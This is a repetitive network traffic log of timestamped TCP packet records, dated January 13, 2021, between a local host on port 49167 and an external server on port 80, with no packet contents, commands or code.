Jan 13, 2021 20:42:46.091509104 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091512918 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091559887 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091592073 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091629982 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091631889 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091666937 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091667891 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091705084 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091706038 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091742992 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091742992 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091779947 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091789007 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091828108 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091830969 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091866970 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091869116 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091905117 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091906071 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091942072 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.091942072 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091978073 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.091981888 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.092014074 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.092073917 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.092113972 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.092113972 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.092152119 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.092152119 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.092190027 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.092190027 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.092226982 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.092227936 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.092264891 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.092274904 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.092313051 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.092317104 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.092351913 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.092353106 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.092389107 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.092391014 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.092426062 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.092430115 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.092462063 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.092466116 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.092500925 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.092504978 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.092540979 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.092542887 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.092577934 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.092588902 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.092638969 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.092644930 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.092683077 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.092685938 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.092719078 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.092725039 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.092761040 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.092763901 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.092799902 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.092801094 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.092834949 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.092839956 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.092875004 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.092876911 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.092912912 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.094114065 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.250799894 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.250890017 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.250957012 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.251024008 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.251071930 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.251091003 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.251096010 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.251147032 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.251163960 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.251219034 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.251244068 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.251291990 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.251302958 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.251329899 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.251337051 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.251368999 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.251382113 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.251406908 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.251411915 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.251445055 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.251451969 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.251482010 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.251492023 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.251523972 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.251528025 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.251569986 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.251574993 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.251606941 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.251617908 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.251646042 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.251651049 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.251682997 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.251693964 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.251718044 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.251729012 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.251755953 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.251765966 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.251786947 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.251792908 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.251837969 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.251840115 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.251880884 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.251887083 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.251918077 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.251929998 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.251956940 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.251957893 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.251996040 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.252007008 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.252029896 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.252032042 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.252069950 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.252079964 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.252106905 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.252119064 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.252137899 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.252154112 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.252194881 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.252198935 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.252232075 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.252243996 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.252268076 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.253496885 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.253559113 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.253596067 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.253602982 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.253622055 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.253634930 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.253647089 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.253674030 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.253695011 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.253710985 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.253722906 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.253750086 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.253765106 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.253788948 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.253803968 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.253835917 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.253837109 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.253881931 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.253894091 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.253918886 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.253932953 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.253957987 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.253968000 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.253997087 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.254008055 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.254036903 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.254061937 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.254076004 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.254090071 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.254112959 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.254117966 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.254160881 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.254173994 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.254180908 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.254203081 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.254206896 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.254240036 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.254255056 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.254277945 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.254283905 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.254317045 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.254328012 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.254353046 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.254369020 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.254393101 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.254395962 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.254431009 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.254441977 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.254470110 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.258812904 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.258868933 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.258905888 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.258912086 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.258933067 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.258955002 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.258956909 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.258997917 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259001970 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259035110 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259042978 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259074926 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259083033 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259114027 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259119987 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259146929 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259150028 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259187937 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259192944 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259222031 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259224892 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259268999 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259272099 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259315014 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259315968 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259351969 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259365082 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259393930 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259396076 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259432077 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259435892 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259464979 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259468079 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259505033 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259510994 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259537935 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259542942 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259587049 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259591103 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259634018 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259634972 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259670019 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259675980 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259705067 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259708881 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259746075 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259756088 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259782076 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259788036 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259820938 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259826899 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259859085 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259862900 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259890079 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259905100 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259948015 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259952068 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.259984016 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.259994984 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260020018 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260021925 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260059118 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260068893 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260092974 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260097027 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260134935 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260139942 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260168076 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260171890 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260215044 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260219097 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260261059 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260262012 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260299921 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260304928 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260340929 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260344028 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260379076 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260390997 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260418892 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260423899 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260456085 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260462999 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260489941 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260494947 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260539055 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260540962 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260582924 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260586977 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260612965 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260620117 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260657072 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260668039 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260690928 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260694981 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260730982 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260740995 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260767937 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260768890 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260807037 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260812044 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260838985 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260854959 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260895967 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260901928 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260927916 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.260932922 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260971069 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.260977030 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261006117 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261008978 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261044979 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261055946 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261080980 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261082888 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261121035 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261164904 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261167049 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261209011 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261213064 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261241913 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261245966 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261284113 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261293888 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261321068 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261322975 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261358023 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261370897 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261404037 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261432886 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261471987 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261482000 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261507034 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261507988 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261552095 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261554956 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261607885 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261615038 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261646032 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261657000 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261683941 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261687040 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261720896 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261756897 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261765957 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261773109 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261795044 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261801958 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261828899 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261833906 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261882067 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261882067 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261924982 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261935949 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261960983 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.261972904 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.261998892 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262010098 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262032032 CET	49167	80	192.168.2.22	191.96.149.225
Jan 13, 2021 20:42:46.262036085 CET	80	49167	191.96.149.225	192.168.2.22
Jan 13, 2021 20:42:46.262073040 CET	80	49167	191.96.149.225	192.168.2.22
